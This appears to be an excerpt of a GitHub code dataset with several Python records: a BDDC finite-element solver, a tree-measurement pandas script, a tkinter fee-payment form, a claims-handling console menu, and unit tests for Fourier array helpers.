np.zeros([eachne])\n mydet = np.zeros([eachne])\n for k in range(eachne):\n n1 = int(lnconn[0,k]);\n n2 = int(lnconn[1,k]);\n n3 = int(lnconn[2,k]);\n x1 =x[0,n1-1];\n y1 = x[1,n1-1];\n x2 = x[0,n2-1];\n y2 = x[1,n2-1];\n x3 = x[0,n3-1];\n y3 = x[1,n3-1];\n if x3<=0.5:\n if y3<=0.5:\n rho=a1;\n else:\n rho=a2;\n else:\n if y3<=0.5:\n rho=a2\n else:\n rho=a1;\n coeff[k]=rho;\n b11 = x2-x1;\n b12 = x3-x1;\n b21 = y2-y1;\n b22=y3-y1;\n detb = b11*b22-b12*b21;\n adetb = abs(detb)*rho;\n mydet[k] = adetb\n d11=b22/detb;\n d12 = -b21/detb;\n d21 = -b12/detb;\n d22=b11/detb;\n w1x = -(d11+d12);\n w1y = -(d21+d22);\n w2x = d11;\n w2y = d21;\n w3x = d12;\n w3y = d22;\n aK[n1-1,n1-1] = aK[n1-1,n1-1]+adetb/2*(w1x*w1x+w1y*w1y);\n aK[n1-1,n2-1] = aK[n1-1,n2-1]+adetb/2*(w1x*w2x+w1y*w2y);\n aK[n1-1,n3-1] = aK[n1-1,n3-1]+adetb/2*(w1x*w3x+w1y*w3y);\n aK[n2-1,n1-1] = aK[n2-1,n1-1]+adetb/2*(w2x*w1x+w2y*w1y);\n aK[n2-1,n2-1] = aK[n2-1,n2-1]+adetb/2*(w2x*w2x+w2y*w2y);\n aK[n2-1,n3-1] = aK[n2-1,n3-1]+adetb/2*(w2x*w3x+w2y*w3y);\n aK[n3-1,n1-1] = aK[n3-1,n1-1]+adetb/2*(w3x*w1x+w3y*w1y);\n aK[n3-1,n2-1] = aK[n3-1,n2-1]+adetb/2*(w3x*w2x+w3y*w2y);\n aK[n3-1,n3-1] = aK[n3-1,n3-1]+adetb/2*(w3x*w3x+w3y*w3y);\n ointx = x1+b11*intx+b12*inty;\n ointy = y1+b21*intx+b22*inty;\n int1 = 0;\n int2 = 0;\n int3=0;\n for i in range(7):\n xxx=ointx[i];\n yyy = ointy[i];\n ff = 2*np.sin(xxx*pi)*pi*pi*np.sin(yyy*pi);\n int1 =int1+ff*(1-intx[i]-inty[i])*intw[i];\n int2 = int2+ff*(intx[i])*intw[i];\n int3 = int3+ff*(inty[i])*intw[i];\n b[n1-1]= b[n1-1]+adetb*int1;\n b[n2-1]= b[n2-1]+adetb*int2;\n b[n3-1]= b[n3-1]+adetb*int3;\n \n domain_utrue[dindex-1, :]=np.zeros(lnv);\n for iit in range(lnv):\n xxx=x[0,iit];\n yyy = x[1,iit];\n domain_utrue[dindex-1,iit] = np.sin(xxx*pi)*np.sin(yyy*pi);\n domain_rho[dindex-1]=rho;\n #boundary treatment\n id_list=[];\n if ii==0:\n id_list= np.append(id_list,lijtk[0,:]);\n id_list = list(set(id_list))\n if ii == Nvm-1:\n id_list = np.append(id_list, lijtk[nvm1-1,:]);\n id_list = list(set(id_list))\n if jj ==0:\n id_list = np.append(id_list, lijtk[:,0]);\n id_list = list(set(id_list))\n if jj==Nvn-1:\n id_list = np.append(id_list, lijtk[:, nvn1-1]);\n id_list = list(set(id_list))\n for l in range(len(id_list)):\n aK[int(id_list[l])-1,:]=0\n aK[:,int(id_list[l])-1]=0\n dd= len(id_list);\n #iidd=max(dd, 1);\n for ddd in range(dd):\n iidd=int(id_list[ddd])\n aK[iidd-1, iidd-1]=1;\n b[iidd-1]=0\n domain_K[dindex-1,:, :] = aK;\n \n temp_matrix = np.zeros([ldd.size, lii.size]);\n for m in range(ldd.size):\n for n in range(lii.size):\n temp_matrix[m, n] = aK[int(ldd[m]-1), int(lii[0,n]-1)];\n domain_Kdi[dindex-1, :, :] = temp_matrix;\n \n temp_matrix = np.zeros([lii.size, lii.size]);\n for m in range(lii.size):\n for n in range(lii.size):\n temp_matrix[m, n] = aK[int(lii[0,m]-1), int(lii[0,n]-1)];\n domain_KiiR[dindex-1,:,:] = scipy.linalg.cholesky(temp_matrix);\n \n temp_matrix = np.zeros([lrr.size, lrr.size]);\n for m in range(lrr.size):\n for n in range(lrr.size):\n temp_matrix[m, n] = aK[int(lrr[m]-1), int(lrr[n]-1)];\n domain_KrrR[dindex-1, :, :] = scipy.linalg.cholesky(temp_matrix);\n \n temp_matrix = np.zeros([lcc.size, lii.size]);\n for m in range(lcc.size):\n for n in range(lii.size):\n temp_matrix[m, n] = aK[int(lcc[m]-1), int(lii[0,n]-1)];\n domain_Kci[dindex-1, :,:] = temp_matrix;\n \n temp_matrix = np.zeros([lcc.size, lcc.size]);\n for m in range(lcc.size):\n for n in range(lcc.size):\n temp_matrix[m, n] = aK[int(lcc[m]-1), int(lcc[n]-1)];\n domain_Kcc[dindex-1, :,:] = temp_matrix;\n \n 
temp_matrix = np.zeros([lrr.size, lcc.size]);\n for m in range(lrr.size):\n for n in range(lcc.size):\n temp_matrix[m, n] = aK[int(lrr[m]-1), int(lcc[n]-1)];\n domain_Krc[dindex-1, :,:] = temp_matrix;\n \n temp_matrix = np.zeros([ldd.size]);\n for m in range(ldd.size):\n temp_matrix[m] = b[int(ldd[m]-1)];\n domain_fd[dindex-1, :] = temp_matrix;\n \n temp_matrix = np.zeros([lcc.size]);\n for m in range(lcc.size):\n temp_matrix[m] = b[int(lcc[m]-1)];\n domain_fc[dindex-1, :] = temp_matrix;\n \n temp_matrix = np.zeros([lii.size]);\n for m in range(lii.size):\n temp_matrix[m] = b[int(lii[0,m]-1)];\n \n domain_fi[dindex-1, :] = temp_matrix;\n \n temp_matrix = np.zeros([lb.size]);\n for m in range(lb.size):\n temp_matrix[m] = b[int(lb[m]-1)];\n domain_fb[dindex-1, :] = temp_matrix;\n \n domain_u[dindex-1, :] = np.zeros(lnv);\n domain_ff[dindex-1,:] = b;\n \n domain_Bc[dindex-1, :, :] = np.zeros([lnv,nc]);\n domain_D[dindex-1, :, :] = np.zeros([lnv, lnv]);\n domain_B[dindex-1, :, :] = np.zeros([lnv, ng]);\n # first get the matrix B --------------------------\n # I order the Lagrange Multiplier as the order:\n\n\n #--- 3 --- 6 --- 9\n # 11 13 15\n #--- 2 --- 5 --- 8\n # 10 12 14\n #--- 1 --- 4 --- 7\n nr=0;\n ng=0;\n id1=lijtk[nvm1-1,1:nvn].astype('int');\n id2=lijtk[0 ,1:nvn].astype('int');\n for i in range(1, Nvm):\n for j in range(1, Nvn+1):\n domIndexL = (i-1)*Nvn+j-1;\n domIndexR = domIndexL+Nvn;\n for jj in range(1, nvn):\n nr = nr+1;\n ng = ng+1;\n domain_B[domIndexL, int(id1[jj-1]-1), ng-1]=1;\n domain_B[domIndexR, id2[jj-1]-1, ng-1]=1;\n rho1 = domain_rho[domIndexL];\n rho2 = domain_rho[domIndexR];\n rhos = rho1+rho2;\n domain_D[domIndexL, id1[jj-1]-1, id1[jj-1]-1] = rho1/rhos;\n domain_D[domIndexR, id2[jj-1]-1, id2[jj-1]-1] = rho2/rhos;\n \n id1 = lijtk[1:nvm, nvn].astype('int');\n id2 = lijtk[1:nvm, 0].astype('int');\n for i in range(1, Nvm+1):\n for j in range(1, Nvn):\n domIndexD = (i-1)*Nvn+j-1;\n domIndexU = domIndexD+1;\n for ii in range(1, nvm):\n nr=nr+1;\n ng = ng+1;\n domain_B[domIndexD, id1[ii-1]-1, ng-1]=1;\n domain_B[domIndexU, id2[ii-1]-1, ng-1]=1;\n rho1 = domain_rho[domIndexD];\n rho2 = domain_rho[domIndexU];\n rhos = rho1+rho2;\n domain_D[domIndexD, id1[ii-1]-1, id1[ii-1]-1] = rho1/rhos;\n domain_D[domIndexU, id2[ii-1]-1, id2[ii-1]-1] = rho2/rhos;\n \n # for crosspoints\n nc=0;\n # to get a global gijtk\n #Domain number\n # 3|4\n #1|2\n \n id1 = lijtk[nvm1-1, nvn1-1].astype('int');\n id2 = lijtk[0, nvn1-1].astype('int');\n id3= lijtk[nvm1-1, 0].astype('int');\n id4 = lijtk[0, 0].astype('int');\n for i in range(1, Nvm):\n indexi = i*nvm1-1;\n for j in range(1, Nvn):\n indexj = j*nvn1-1;\n domIndex1 = (i-1)*Nvn+j-1;\n domIndex2 = domIndex1+Nvn;\n domIndex3 = domIndex1 +1;\n domIndex4 = domIndex2+1;\n #global id\n #id = ijtk[indexi-1, indexj-1]\n #NCross = [Ncross id];\n #local id\n nc=nc+1\n id=nc;\n ng=ng+1;\n domain_Bc[domIndex1, id1-1, id-1]=1;\n domain_Bc[domIndex2, id2-1, id-1]=1;\n domain_Bc[domIndex3, id3-1, id-1]=1;\n domain_Bc[domIndex4, id4-1, id-1]=1;\n rho1 = domain_rho[domIndex1]\n rho2 = domain_rho[domIndex2]\n rho3 = domain_rho[domIndex3]\n rho4 = domain_rho[domIndex4]\n rhos=rho1+rho2+rho3+rho4;\n domain_D[domIndex1, id1-1, id1-1] = rho1/rhos;\n domain_D[domIndex2, id2-1, id2-1] = rho2/rhos;\n domain_D[domIndex3, id3-1, id3-1] = rho3/rhos;\n domain_D[domIndex4, id4-1, id4-1] = rho4/rhos;\n domain_B[domIndex1, id1-1, ng-1]=1;\n domain_B[domIndex2, id2-1, ng-1]=1;\n domain_B[domIndex3, id3-1, ng-1]=1;\n domain_B[domIndex4, id4-1, ng-1]=1; \n nr1=nr+1;\n \n 
#begin main part\n \n KccS = np.zeros([nc, nc]);\n dr = np.zeros([ng, 1]);\n ug = np.zeros([ng, 1]);\n lb = lb.astype('int')\n lii = lii.astype('int')\n for i in range(DomNum):\n lfi=np.linalg.solve(domain_KiiR[i, :, :], (np.linalg.solve(domain_KiiR[i,:,:].T, domain_fi[i,:]) ));\n #lii = np.reshape(lii,max(lii.shape) );\n temp_matrix = np.zeros([max(lb.shape),max(lii.shape) ])\n for lbindex in range(max(lb.shape)):\n for liiindex in range(max(lii.shape)):\n temp_matrix[lbindex, liiindex] = domain_K[i, lb[lbindex]-1, lii[0,liiindex]-1]\n \n update = (domain_B[i,lb-1,:].T) @ (domain_fb[i, :]-temp_matrix@lfi)\n update_sz = update.size\n update = np.reshape(update,(update_sz,1))\n dr = dr + update\n lcc =lcc.astype('int');\n temp_matrix = np.linalg.solve(domain_KrrR[i,:,:].T, domain_Krc[i,:,:]);\n \n temp_matrix = np.linalg.solve(domain_KrrR[i, :, :], temp_matrix);\n KccS = KccS+domain_Bc[i, lcc-1, :].T@(domain_Kcc[i]-domain_Krc[i, :, :].T@temp_matrix)@domain_Bc[i, lcc-1, :];\n \n Rc = scipy.linalg.cholesky(KccS);\n #input good up to this point for the below function\n [ug, error, iterate, flag]= cg(ug, dr, max_it, tol)\n #output is good now\n \n for i in range(DomNum):\n for m in range(lb.size):\n domain_u[i, lb[m]-1] = domain_B[i, lb[m]-1, :]@ug;\n [index2] = lb.shape\n [index1] = lii[0, :].shape\n temp4 = np.empty([index1, index2])\n for j in range(index1):\n for k in range(index2):\n temp4[j, k] = domain_K[i, lii[0, j]-1, lb[k]-1]\n ytemp = domain_fi[i,:]-temp4@domain_u[i, lb-1]\n #continue here\n ytemp = np.linalg.solve(domain_KiiR[i, :, :].T, ytemp)\n domain_u[i, lii-1]=np.linalg.solve(domain_KiiR[i, :, :], ytemp)\n resl2 = 0\n errmax = 0\n for i in range(DomNum):\n udiff = domain_utrue[i, :]-domain_u[i,:]\n resl2 = resl2+np.linalg.norm(udiff)**2\n errmax = max(max(abs(udiff)), errmax)\n resl2 = (resl2**.5)/(nvm*Nvm)\n stop = time.time()\n print('Time Elasped:' + str(stop - start))\n print('L2 = ' + str(resl2))\n print('max = '+ str(errmax ))\n \n \n \n \n\n\n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n\n\n# In[57]:\n\n\nBDDC(3, 4, 2, 7)\n\n\n# In[58]:\n\n\nA = np.array([[2,2]])\nA=np.reshape(A, 2)\nprint(A)\n\n\n# In[59]:\n\n\nmax(A.shape)\n\n\n# In[60]:\n\n\nA.astype('int')\n\n\n# In[ ]:\n\n\n\n\n\n# In[61]:\n\n\nprint(Nvm)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Nrdman/BDDC","sub_path":"BDDC_EO.py","file_name":"BDDC_EO.py","file_ext":"py","file_size_in_byte":22480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16506764057","text":"import pandas as pd\nimport os\n\ndirectorio = '../Data'\narchivo1 = 'arbolado-publico-lineal-2017-2018.csv'\narchivo2= 'arbolado-en-espacios-verdes.csv'\nfname1 = os.path.join(directorio,archivo1)\nfname2 = os.path.join(directorio,archivo2)\ndf_parques= pd.read_csv(fname1)\ndf_veredas= pd.read_csv(fname2)\ncols_sel1= ['altura_arbol', 'diametro_altura_pecho' , 'nombre_cientifico']\ncols_sel2= ['altura_tot', 'diametro', 'nombre_cie']\ndf_tipas_parques = df_parques[df_parques['nombre_cientifico'] == 'Tipuana tipu'][cols_sel1].copy()\ndf_tipas_veredas = df_veredas[df_veredas['nombre_cie'] == 'Tipuana Tipu'][cols_sel2].copy()\ndf_tipas_veredas.columns=['altura_arbol', 'diametro_altura_pecho', 'nombre_cientifico']\ndf_tipas_parques=df_tipas_parques.assign(ambiente='parque')\ndf_tipas_veredas=df_tipas_veredas.assign(ambiente='vereda')\ndf_tipas = pd.concat([df_tipas_veredas, 
df_tipas_parques])\n\ndf_tipas.boxplot('diametro_altura_pecho',by = 'ambiente')\n\ndf_tipas.boxplot('altura_arbol',by = 'ambiente')\n\ndef par(n):\n return inpar(n-1)\ndef inpar(n):\n if n ==0:\n return False\n return par(n-1)\n\nprint(inpar(4))\n","repo_name":"CristianAmici/python","sub_path":"clase08/arbolado_parques_veredas.py","file_name":"arbolado_parques_veredas.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22264248960","text":"from tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nfrom tuitions import Payment\r\nfrom student import Student\r\n# functions\r\n\r\n\r\n\r\nwindow = Tk()\r\nwindow.title(\"Fees Payment\")\r\n\r\ndef add_fees():\r\n tuition = int(tuition_entry.get())\r\n lib_fee = int(lib_fee_entry.get())\r\n func_fee = int(func_fee_entry.get())\r\n med_fee = int(med_fee_entry.get())\r\n\r\n Payment.set_total_fees(tuition, lib_fee, func_fee,med_fee)\r\n Total_fee_entry.delete(0)\r\n Total_fee_entry.insert(0,string=f\"total_fees is: {Payment.get_total_fees()}\")\r\n\r\nstds = []\r\ndef student_details():\r\n global stds\r\n name = name_entry.get()\r\n age = age_entry.get()\r\n fees = int(fee_paid_entry.get())\r\n std1 = Student(name, age, fees)\r\n\r\n stds = std1.get_all_students()\r\ndef print_students():\r\n output_text.insert(tk.END, 'All the Students: ')\r\n i = 0\r\n for std in stds:\r\n output_text.insert(tk.END, f'\\n\\nStudent {i + 1}')\r\n output_text.insert(tk.END, f'\\n{std}')\r\n i +=1\r\n\r\n output_text.insert(tk.END, '\\nSTUDENTS WHO HAVE PAID: ')\r\n paid = Payment.get_paid_std()\r\n\r\n for pa in paid:\r\n output_text.insert(tk.END, f'\\n{pa}')\r\n\r\n\r\n\r\n# creating labels\r\nsetting_fees_label = ttk.Label(text = \"Setting fees\")\r\nsetting_fees_label.grid(row=0, column=1)\r\n\r\ntuition_label = ttk.Label(text=\"Enter tuition: \")\r\ntuition_label.grid(row=1, column=0)\r\n\r\nmed_fee_label = ttk.Label(text=\"Enter med_fee: \")\r\nmed_fee_label.grid(row=2, column=0)\r\n\r\nlib_fee_label = ttk.Label(text=\"Enter lib_fee:\")\r\nlib_fee_label.grid(row=3, column=0)\r\n\r\nfunc_fee_label = ttk.Label(text=\"Enter func_fee: \")\r\nfunc_fee_label.grid(row=4, column=0)\r\n\r\nTotal_fee_label = ttk.Label(text=\"Total_fee: \")\r\nTotal_fee_label.grid(row=5, column=0)\r\n\r\nfees_paid_label = ttk.Label(text=\"Fees_paid: \")\r\nfees_paid_label.grid(row=7, column=0)\r\n\r\nname_label = ttk.Label(text=\"Enter student name: \")\r\nname_label.grid(row=9, column=0)\r\n\r\nage_label = ttk.Label(text=\"Enter student age: \")\r\nage_label.grid (row=10, column=0)\r\n\r\n#fee_label = ttk.Label(text=\"Enter fees paid: \")\r\n#fee_label.grid(row=11, column=0)\r\n\r\n\r\n\r\n\r\n# setting entry\r\ntuition_entry = Entry(width=30)\r\ntuition_entry.grid(row=1, column=1)\r\ntuition_entry.focus()\r\n\r\nmed_fee_entry = Entry(width=30)\r\nmed_fee_entry.grid(row=2, column=1)\r\n\r\n\r\nlib_fee_entry = Entry(width=30)\r\nlib_fee_entry.grid(row=3, column=1)\r\n\r\n\r\nfunc_fee_entry = Entry(width=30)\r\nfunc_fee_entry.grid(row=4, column=1)\r\n\r\nTotal_fee_entry = Entry(width=25)\r\nTotal_fee_entry.grid(row=5, column=1)\r\n\r\nfee_paid_entry = Entry(width=20)\r\nfee_paid_entry.grid(row=7, column=1)\r\n\r\nname_entry = Entry(width=30)\r\nname_entry.grid(row=9, column=1)\r\n\r\nage_entry = Entry(width=15)\r\nage_entry.grid(row=10, column=1)\r\n\r\n#fee_paid_entry = Entry(width=20)\r\n#fee_paid_entry.grid(row=11, column=1)\r\n\r\n\r\n\r\n# creating 
button\r\ntotal_fee_button = Button(text=\"add_fees\", command=add_fees)\r\ntotal_fee_button.grid(row=6, column=1)\r\n\r\n\r\n\r\nrecord_student_label = ttk.Label(text=\"\\nDO YOU WANT TO ADD MORE STUDENTS:\")\r\nrecord_student_label.grid(row=12, column=1)\r\nrecord_student_button = ttk.Button( text='YES', command=student_details)\r\nrecord_student_button.grid(row=12, column=2)\r\n\r\nno_more_student_label = ttk.Label(text=\"\\nDO YOU WANT TO RECORD THIS STUDENT:\")\r\nno_more_student_label.grid(row=13, column=1)\r\nno_more_student_button = ttk.Button(text='NO', command=print_students)\r\nno_more_student_button.grid(row=13, column=2)\r\n\r\nprint_button = ttk.Button(text='\\nPrint Students', command=print_students)\r\nprint_button.grid(row=14, column=2)\r\n\r\noutput_text = Text()\r\noutput_text.grid(row=15, column=2)\r\n\r\n\r\n\r\n\r\nwindow.mainloop()","repo_name":"OgwangOsbornmark/osborn-tkinter","sub_path":"TK TEST/PAYMENT.PY","file_name":"PAYMENT.PY","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6356942031","text":"\nimport repo\n\nwhile True:\n print(\"Komodo Claims Department\")\n user_input = input('Choose an item from the menu: \\n'\n '1. See all claims. \\n'\n '2. Enter new claim. \\n'\n '3. Take care of next claim. \\n'\n '4. Exit. \\n')\n\n if user_input == '1':\n claims_list = repo.RepoFunctions()\n claims_list.see_claims()\n print('Claim id\\t\\tType\\t\\tDescription\\t\\tAmount\\t\\tDate of Incident\\t\\tDate of Claim\\t\\tIs Valid')\n for ind_claims in repo.claims:\n print(f'{ind_claims.claim_id}\\t\\t\\t{ind_claims.claim_type}\\t\\t{ind_claims.description}\\t\\t{ind_claims.claim_amount}\\t\\t{ind_claims.date_of_incident}\\t\\t\\t{ind_claims.date_of_claim}\\t\\t\\t\\t{ind_claims.is_valid}')\n\n if user_input == '2':\n claim_id = input(\"What is the claim id: \\n\")\n claim_type = input(\"What is type of claim is it: \\n\")\n description = input(\"Describe the claim: \\n\")\n claim_amount = input(\"What is the claim amount: \\n\")\n date_of_incident = input(\n \"When did the incident happen:(mm/dd/yyyy) \\n\")\n date_of_claim = input(\"When was the claim issued: (mm/dd/yyyy) \\n\")\n is_valid = input(\"Is the claim valid: \\n\")\n new_claim = repo.RepoFunctions()\n new_claim.add_claim(claim_id, claim_type, description,\n claim_amount, date_of_incident, date_of_claim, is_valid)\n if user_input == '3':\n next_claim = repo.claims[0]\n print(\"Here are the claim details for the next claim:\")\n print(f'Claim ID: {next_claim.claim_id}')\n print(f'Claim Type: {next_claim.claim_type}')\n print(f'Description: {next_claim.description}')\n print(f'Claim Amount: {next_claim.claim_amount}')\n print(f'Date of Incident: {next_claim.date_of_incident}')\n print(f'Date of Claim: {next_claim.date_of_claim}')\n print(f'Is Valid: {next_claim.is_valid}')\n y_or_n = input('Do you want to deal with this claim now(y/n)?')\n if y_or_n == 'y':\n y_option = repo.RepoFunctions()\n y_option.take_next_claim()\n elif y_or_n == 'n':\n pass\n if user_input == '4':\n exit()\n","repo_name":"PRMcgill/Gold_Challenges","sub_path":"challenge_2/komodo_ui.py","file_name":"komodo_ui.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991206588","text":"\"\"\"\nUnit tests for fourier_algorithm.py functions\n\"\"\"\n\nimport itertools\n\nimport dask\nimport numpy\nimport pytest\n\nfrom 
ska_sdp_exec_swiftly.fourier_transform.algorithm_parameters import (\n BaseArrays,\n)\nfrom ska_sdp_exec_swiftly.fourier_transform.fourier_algorithm import (\n broadcast,\n coordinates,\n create_slice,\n extract_mid,\n fft,\n ifft,\n ith_subgrid_facet_element,\n make_facet_from_sources,\n make_subgrid_and_facet_from_sources,\n make_subgrid_from_sources,\n pad_mid,\n roll_and_extract_mid,\n roll_and_extract_mid_axis,\n)\n\n\ndef test_pad_mid_1d():\n \"\"\"\n perform operation on 1D array\n\n 1 1 1 --> 0 1 1 1 0\n \"\"\"\n array = numpy.ones(3)\n desired_size = 5\n result = pad_mid(array, desired_size, axis=0)\n\n assert (result == numpy.array([0, 1, 1, 1, 0])).all()\n\n\ndef test_pad_mid_2d_axis0():\n \"\"\"\n perform operation for axis=0\n\n 0 0 0\n 1 1 1 1 1 1\n 1 1 1 --> 1 1 1\n 1 1 1 1 1 1\n 0 0 0\n \"\"\"\n array = numpy.ones((3, 3))\n desired_size = 5\n expected_array = numpy.array(\n [[0, 0, 0], [1, 1, 1], [1, 1, 1], [1, 1, 1], [0, 0, 0]]\n )\n result = pad_mid(array, desired_size, axis=0)\n\n assert (result == expected_array).all()\n\n\ndef test_pad_mid_2d_axis1():\n \"\"\"\n perform operation for axis=1\n\n 1 1 1 0 1 1 1 0\n 1 1 1 --> 0 1 1 1 0\n 1 1 1 0 1 1 1 0\n \"\"\"\n array = numpy.ones((3, 3))\n desired_size = 5\n expected_array = numpy.array(\n [\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n ]\n )\n result = pad_mid(array, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n\ndef test_pad_mid_2d_axis01():\n \"\"\"\n perform operation for axis=0 and axis=1\n\n 0 0 0 0 0\n 1 1 1 0 1 1 1 0\n 1 1 1 --> 0 1 1 1 0\n 1 1 1 0 1 1 1 0\n 0 0 0 0 0\n \"\"\"\n array = numpy.ones((3, 3))\n desired_size = 5\n expected_array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n [0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0],\n ]\n )\n first_pad = pad_mid(array, desired_size, axis=0)\n result = pad_mid(first_pad, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n\ndef test_extract_mid_1d():\n \"\"\"\n perform operation on 1D array\n\n if new size can be evenly extracted from original size:\n 7 -> 5\n x y y y y y x --> y y y y y\n\n if new size doesn't allow for even extraction from the middle,\n then the middle is extracted plus the one element just before the middle\n 7 -> 4\n x x y y y x x --> x y y y\n \"\"\"\n full_array = numpy.array([0, 1, 2, 3, 4, 5, 6])\n desired_size = 5\n result = extract_mid(full_array, desired_size, axis=0)\n\n assert (result == numpy.array([1, 2, 3, 4, 5])).all()\n\n desired_size = 4\n result = extract_mid(full_array, desired_size, axis=0)\n\n assert (result == numpy.array([1, 2, 3, 4])).all()\n\n\ndef test_extract_mid_2d_axis0():\n \"\"\"\n perform operation for axis=0\n\n if new size can be evenly extracted from original size:\n 3 -> 1\n x x x x\n x y y x --> x y y x\n x x x x\n\n if new size doesn't allow for even extraction from the middle,\n then the middle is extracted plus the one element just BEFORE the middle\n (AXIS=0 only)\n 3 -> 2\n x x x x x x x x\n x y y x --> x y y x\n x x x x\n \"\"\"\n full_array = numpy.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]])\n desired_size = 1\n expected_array = numpy.array([[4, 5, 6, 7]])\n result = extract_mid(full_array, desired_size, axis=0)\n assert (result == expected_array).all()\n\n desired_size = 2\n expected_array = numpy.array([[0, 1, 2, 3], [4, 5, 6, 7]])\n result = extract_mid(full_array, desired_size, axis=0)\n\n assert (result == expected_array).all()\n\n\ndef test_extract_mid_2d_axis1():\n \"\"\"\n perform operation for axis=1\n\n if new 
size can be evenly extracted from original size:\n 4 -> 2\n x x x x x x\n x y y x --> y y\n x x x x x x\n\n if new size doesn't allow for even extraction from the middle,\n then the middle is extracted plus the one element just AFTER the middle\n (AXIS=1 only)\n 4 -> 3\n x x x x x x x\n x y y x --> y y x\n x x x x x x x\n \"\"\"\n full_array = numpy.array([[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11]])\n desired_size = 2\n expected_array = numpy.array([[1, 2], [5, 6], [9, 10]])\n result = extract_mid(full_array, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n desired_size = 3\n expected_array = numpy.array([[1, 2, 3], [5, 6, 7], [9, 10, 11]])\n result = extract_mid(full_array, desired_size, axis=1)\n\n assert (result == expected_array).all()\n\n\ndef test_extract_mid_2d_axis01():\n \"\"\"\n perform operation for axis=0 and axis=1\n\n square matrix (input and output too):\n 5x5 -> 3x3\n x x x x x\n x y y y x y y y\n x y y y x --> y y y\n x y y y x y y y\n x x x x x\n\n\n 5x5 -> 3x2\n x x x x x\n x y y z x y y\n x y y z x --> y y\n x y y z x y y\n x x x x x\n \"\"\"\n full_array = numpy.array(\n [\n [0, 1, 2, 3, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24],\n ]\n )\n desired_size = 3\n expected_array = numpy.array([[6, 7, 8], [11, 12, 13], [16, 17, 18]])\n result = extract_mid(\n extract_mid(full_array, desired_size, axis=0), desired_size, axis=1\n )\n\n assert (result == expected_array).all()\n\n desired_size_axis0 = 3\n desired_size_axis1 = 2\n expected_array = numpy.array([[6, 7], [11, 12], [16, 17]])\n result = extract_mid(\n extract_mid(full_array, desired_size_axis0, axis=0),\n desired_size_axis1,\n axis=1,\n )\n\n assert (result == expected_array).all()\n\n\ndef test_fft_1d():\n \"\"\"\n FFT of a 1D array (== axis=0)\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 5 0 0\n \"\"\"\n array = numpy.ones(5)\n result = fft(array, axis=0)\n assert result.dtype == complex\n assert (result == numpy.array([0, 0, 5, 0, 0], dtype=complex)).all()\n\n\ndef test_fft_2d_axis0():\n \"\"\"\n FFt along axis=0\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 0 0 0\n 1 1 1 1 1 3 3 3 3 3\n 1 1 1 1 1 0 0 0 0 0\n \"\"\"\n array = numpy.ones((3, 5))\n result = fft(array, axis=0)\n assert result.dtype == complex\n assert (\n result[numpy.where(result != 0)]\n == numpy.array([3, 3, 3, 3, 3], dtype=complex)\n ).all()\n\n\ndef test_fft_2d_axis1():\n \"\"\"\n FFT along axis=1\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 5 0 0\n 1 1 1 1 1 0 0 5 0 0\n 1 1 1 1 1 0 0 5 0 0\n \"\"\"\n array = numpy.ones((3, 5))\n result = fft(array, axis=1)\n assert result.dtype == complex\n assert (\n result[numpy.where(result != 0)]\n == numpy.array([[5], [5], [5]], dtype=complex)\n ).all()\n\n\ndef test_fft_2d_axis01():\n \"\"\"\n FFT along axis=0 and axis=1\n\n input array: --> fft (complex):\n 1 1 1 1 1 0 0 0 0 0\n 1 1 1 1 1 0 0 15 0 0\n 1 1 1 1 1 0 0 0 0 0\n \"\"\"\n array = numpy.ones((3, 5))\n result = fft(fft(array, axis=0), axis=1)\n assert result.dtype == complex\n assert (\n result[numpy.where(result != 0)] == numpy.array([15], dtype=complex)\n ).all()\n\n\ndef test_ifft_1d():\n \"\"\"\n iFFT of a 1D array (== axis=0)\n \"\"\"\n result = ifft(numpy.array([0, 0, 5, 0, 0], dtype=complex), axis=0)\n assert (result == numpy.ones(5)).all()\n\n\ndef test_ifft_2d_axis0():\n \"\"\"\n iFFT along axis=0\n \"\"\"\n array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 0, 15, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n dtype=complex,\n )\n\n result = ifft(array, 
